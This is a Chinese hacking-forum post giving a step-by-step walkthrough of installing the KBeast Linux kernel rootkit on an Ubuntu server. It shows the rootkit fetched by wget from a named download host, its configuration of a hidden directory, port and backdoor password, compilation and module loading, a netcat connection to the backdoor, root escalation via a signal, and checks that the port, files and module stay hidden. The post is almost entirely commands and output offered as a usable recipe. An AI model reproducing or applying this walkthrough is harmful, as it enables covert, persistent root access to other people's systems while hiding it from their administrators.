切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
374 KBeast – Kernel Rootkit FOR UBUNTU[复制链接]
发表于 2012-12-13 00:25:30 | 显示全部楼层 |!read_mode!
支持 2.6.16, 2.6.18, 2.6.32, 2.6.35 等
先备份SERVER 打开SERVER


  1. root@Server:/tmp# wget http://lucky.fuzzexp.org/file/r00tk1t/kbeast_shit.tar.gz
  2. root@Server:/tmp# tar xf kbeast_shit.tar.gz
  3. root@Server:/tmp# cd kbeast-v1/
  4. root@Server:/tmp/kbeast-v1#
复制代码

看他的说明

- In order to install in kernel 2.6.18, execute ./setup build 0
- In order to install in kernel 2.6.32, execute ./setup build (actually it
should work for 2.6.24 or more)
- In order to install in kernel 2.6.9, edit .cc1 file to remove all
sys_unlinkat() related code and modify syscall table address manually, then
execute ./setup build 0

  1. root@Server:/tmp/kbeast-v1# uname -a
  2. Linux Server 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
  3. root@Server:/tmp/kbeast-v1#
复制代码
我的是2.6.18 的 所以 ./setup build编辑config.h 需要注意的
  1. #define _H4X_PATH_ "/usr/_h4x_" # 目录
  2. #define _HIDE_PORT_ 13377            # 端口
  3. #define _RPASSWORD_ "h4x3d"          # 密码
复制代码

我久不修改了 直接安装
  1. root@Server:/tmp/kbeast-v1# ./setup build

  2. :::::::::::  :::::::::    ::::::::   ::::::::::   ::::::::    ::::::::
  3.     :+:      :+:    :+:  :+:    :+:  :+:         :+:    :+:  :+:    :+:
  4.     +:+      +:+    +:+  +:+         +:+         +:+         +:+
  5.     +#+      +#++:++#+   +#++:++#++  +#++:++#    +#+         +#++:++#++
  6.     +#+      +#+                +#+  +#+         +#+                +#+
  7.     #+#      #+#         #+#    #+#  #+#         #+#    #+#  #+#    #+#
  8. ###########  ###          ########   ##########   ########    ########

  9. Checking for Kernel Beast : [OK]
  10. Checking for sed : /bin/sed
  11. Generating C file from .cc1 : [OK]
  12. Checking for Makefile : [OK]
  13. Checking for Network Daemon : [OK]
  14. Checking for Config File : [OK]
  15. Checking for Kernel Header : [OK]
  16. Checking for gcc : /usr/bin/gcc
  17. Checking for make : /usr/bin/make
  18. Checking for kernel version : [OK]
  19. Creating Install Directory : [OK]
  20. Compiling Kernel Module : [OK]
  21. Compiling Network Daemon File : [OK]
  22. Inserting Loadable Kernel Module : [OK]
  23. Running Network Daemon for Remote Access :
  24. Daemon running with PID = 1367
  25. Build Complete!

  26. TO DO : modify init script to load this backdoor at start-up
  27. Example can be found on ./init/ directory
  28. root@Server:/tmp/kbeast-v1#
复制代码

先来链接
  1. brk<~> $ nc -vv 5.5.5.5 13377
  2. Connection to 5.5.5.5 13377 port [tcp/*] succeeded!

  3. :::::::::::  :::::::::    ::::::::   ::::::::::   ::::::::    ::::::::
  4.    :+:       :+:    :+:  :+:    :+:  :+:         :+:    :+:  :+:    :+:
  5.    +:+       +:+    +:+  +:+         +:+         +:+         +:+      
  6.    +#+       +#++:++#+   +#++:++#++  +#++:++#    +#+         +#++:++#++
  7.    +#+       +#+                +#+  +#+         +#+                +#+
  8.    #+#       #+#         #+#    #+#  #+#         #+#    #+#  #+#    #+#
  9. ###########  ###          ########   ##########   ########    ########

  10. Password [displayed to screen]: h4x3d
  11. << Welcome To The Server >>
  12. bash: no job control in this shell
  13. bin@Server:~$ id  
  14. id
  15. uid=2(bin) gid=2(bin) groups=2(bin)
复制代码

不是ROOT权限??? 需要发送个东西
  1. bin@Server:~$ kill -37 31337
  2. kill -37 31337
  3. bin@Server:~$ id
  4. id
  5. uid=0(root) gid=0(root) groups=0(root),2(bin)
  6. bin@Server:~$
复制代码

ROOT了 普通的SHELL
  1. root@Server:/tmp/kbeast-v1# su brk
  2. keyctl_search: Required key not available
  3. Perhaps try the interactive 'ecryptfs-mount-private'
  4. To run a command as administrator (user "root"), use "sudo <command>".
  5. See "man sudo_root" for details.

  6. brk@Server:/tmp/kbeast-v1$ id
  7. uid=1000(brk) gid=1000(brk) groups=1000(brk),4(adm),20(dialout),24(cdrom),46(plugdev),109(lpadmin),110(sambashare),111(admin)
  8. brk@Server:/tmp/kbeast-v1$ kill -37 31337
  9. brk@Server:/tmp/kbeast-v1$ id
  10. uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),109(lpadmin),110(sambashare),111(admin),1000(brk)
  11. brk@Server:/tmp/kbeast-v1$
复制代码

取得ROOT权限
查看隐藏
  1. root@Server:/tmp/kbeast-v1# netstat -antp
  2. Active Internet connections (servers and established)
  3. Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
  4. tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      729/mysqld      
  5. tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      642/sshd        
  6. tcp        0      0 5.5.5.5:22              5.5.5.1:46192           ESTABLISHED 1051/0         
  7. tcp6       0      0 :::80                   :::*                    LISTEN      916/apache2     
  8. tcp6       0      0 :::22                   :::*                    LISTEN      642/sshd        
  9. root@Server:/tmp/kbeast-v1#
复制代码

端口隐藏了查看目录隐藏
  1. brk@Server:/tmp/kbeast-v1$ cd /usr/
  2. brk@Server:/usr$ ls
  3. bin  games  include  lib  local  sbin  share  src
  4. brk@Server:/usr$
复制代码

隐藏的不错
  1. brk@Server:/usr$ cd _h4x_
  2. brk@Server:/usr/_h4x_$ ls
  3. acctlog.0     bd-ipsecs-kbeast-v1.c  ipsecs-kbeast-v1.c    ipsecs-kbeast-v1.mod.c  LICENSE          Module.symvers
  4. acctlog.1000  config.h                     ipsecs-kbeast-v1.cc1  ipsecs-kbeast-v1.mod.o  Makefile          README.TXT
  5. acctlog.2     init                     ipsecs-kbeast-v1.ko   ipsecs-kbeast-v1.o           modules.order  setup
  6. brk@Server:/usr/_h4x_$
复制代码


查看模块隐藏
  1. brk@Server:/usr/_h4x_$ lsmod | grep ipsecs
  2. brk@Server:/usr/_h4x_$
复制代码





操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-3 03:40

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部